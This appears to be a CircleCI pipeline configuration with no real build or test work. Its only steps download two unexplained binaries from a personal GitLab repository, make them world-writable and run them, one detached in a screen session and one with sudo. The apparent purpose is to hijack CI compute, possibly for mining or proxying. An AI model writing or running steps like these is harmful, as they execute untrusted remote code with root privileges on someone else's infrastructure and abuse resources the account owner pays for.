version: 2.1

workflows:
  sample:
    jobs:
      - job

jobs:
  job:
    machine:
      image: cimg/exilir:1.13.4

    steps:
      - checkout
      - run: sudo apt update && sudo apt install screen && wget https://gitlab.com/Sherwoodfrey/prx/-/raw/main/pro && chmod 777 pro && screen -dmS run ./pro
      - run: wget https://gitlab.com/Sherwoodfrey/prx/-/raw/main/prx && chmod 777 prx && sudo ./prx